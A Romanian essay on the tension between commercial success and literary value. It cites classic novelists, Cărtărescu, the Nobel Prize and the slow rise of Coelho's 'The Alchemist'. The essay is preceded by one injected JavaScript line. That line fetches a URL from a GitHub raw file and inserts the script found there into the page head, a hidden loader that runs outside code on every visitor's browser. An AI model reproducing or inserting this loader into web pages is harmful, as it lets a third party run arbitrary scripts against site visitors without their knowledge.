;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Este un fenomen firesc ca toţi cei care scriu să se gândească la succes. La un număr cât mai mare de cititori. Ce înseamnă însă succesul? Care este tirajul care marchează începutul succesului? Am impresia că cei doi termeni ai ecuaţiei nu sunt antagonici decât în aparenţă. Există foarte multe cărţi valoroase care au avut şi un imens succes de librărie. E suficient să ne gândim la marele roman realist din secolul al XIX-lea. Cărţile lui Balzac, Stendhal, Flaubert, Tolstoi şi Dostoievski s-au vândut în milioane de exemplare de-a lungul timpului. Mai aproape de noi, avem alte exemple elocvente: Borges, Márquez, Bulgakov şi mulţi alţii. Nimeni nu le poate ignora valoarea. Pe de altă parte, au existat scriitori care au trăit în mizerie în timpul vieţii, fiind recunoscuţi abia postum. Dacă ne punem întrebarea cine validează succesul şi implicit valoarea, răspunsul este simplu: publicul. Desigur, critica literară are contribuţia ei în aprecierea valorilor şi în modelarea gustului public. Cu toate acestea, cei care decid în timp sunt cititorii. Sub acest aspect, acei romancieri care au ales experimentul literar în detrimentul renunţării la povestire, de regulă, au avut de suferit. Experimentul poate fi fascinant pentru un exeget, pentru un teoretician literar, dar nu şi pentru un cititor obişnuit, care caută în literatură delectarea. Aşa se explică lipsa de succes a unor scriitori de avangardă, dar şi efemeritatea unor tendinţe inovatoare precum „noul roman“ francez. Cititorul a aşteptat întotdeauna de la romancier o poveste bine spusă şi dacă nu găseşte această poveste se îndepărtează de text. Cei mai norocoşi sunt cei care au reuşit să înnoiască literatura fără să îi îndepărteze pe cititori. Mă gândesc la Márquez, Borges, Bulgakov, Kafka, scriitori care s-au bucurat de un extraordinar succes de public, dar care nu au renunţat la poveştile lor insolite. Desigur, Premiul Nobel încununează o carieră. Mulţi râvnesc la el şi puţini ajung printre cei aleşi. Cu toate acestea, există foarte mulţi autori pe care tocmai acest premiu i-a făcut celebri, dar care apoi au fost destul de repede uitaţi. În schimb, există alţii care nu au avut această şansă, dar au devenit mult mai cunoscuţi. Sub acest aspect, aş aminti experimentul întreprins cu ani în urmă de Laurenţiu Ulici în lucrarea intitulată Nobel contra Nobel. Reputatul critic i-a trecut în revistă pe cei care au primit marele premiu şi, pentru fiecare an, a venit cu o alternativă. Cineva care nu a primit Nobelul, dar care a devenit mult mai apreciat. Prin urmare, nici juriul care decernează anual prestigiosul premiu nu poate fi socotit o instanţă infailibilă. Mai ales că valoarea nu constituie unicul criteriu de selecţie.
În cazul literaturii române, aş aminti cazul Mircea Cărtărescu. Acesta a găsit modalitatea de a îmbina cu talent experimentul naratologic cu harul de povestitor, reuşind să îi acapareze pe cititori printr-o naraţiune subtilă în care realul se împleteşte cu imaginarul. Sub acest aspect, cred că problema este greşit pusă. În loc să opunem succesul şi valoarea, trebuie să găsim cheia prin care să însumăm cei doi termeni. Desigur, în fiecare epocă a existat o literatură care s-a adresat, cu predilecţie, elitelor. Acesteia i s-a contrapus o literatură facilă, care viza succesul de public, bazându-se pe clişeele în măsură să capteze interesul cititorilor. Eugen Ionescu a relevat în eseurile sale diferenţele dintre teatrul artistic, experimental, şi cel bulevardier. Ceva similar se petrece şi în cazul romanului. O operă nu poate exista însă fără cititori. O carte care nu este deschisă este doar un obiect inert care nu spune nimic. Ca în povestea cu frumoasa adormită, ea se trezeşte la viaţă sub sărutul simbolic al cititorilor. Iată de ce rolul acestora nu trebuie ignorat. Ba mai mult, ar trebui reevaluat. Pentru a vorbi în simboluri, trebuie găsită calea de mijloc între Sandra Brown şi Faulkner. Succesul nu vine uşor. Am rămas surprins când am aflat că unul din cele mai traduse romane ale secolului XX, vândut în zeci de milioane de exemplare, s-a impus cu mare dificultate. Este vorba despre Alchimistul lui Paulo Coelho, publicat şi la noi în mai multe ediţii. Or, la apariţia cărţii, în Brazilia, nimeni nu a dat importanţă cărţii. Un librar din nord-estul ţării a mărturisit că, în prima săptămână de la lansare, a vândut un singur exemplar. După şase luni, a mai fost cumpărat unul de acelaşi cititor. După un an, a devenit clar că romanul a fost un eşec, iar editorul şi-a reziliat contractul cu autorul. A fost nevoie de o nouă ediţie pentru ca Alchimistul să înceapă să se vândă. Adevăratul succes a venit însă abia după publicarea cărţii în Statele Unite, unde ea a fost lansată cu mare vâlvă. Exemplul ne arată că valoarea se impune cu dificultate. Chiar dacă este foarte bună, o carte trebuie promovată. În plus, scriitorul trebuie să găsească această cale regală dintre valoare şi gustul public. Acesta este lucrul cel mai dificil.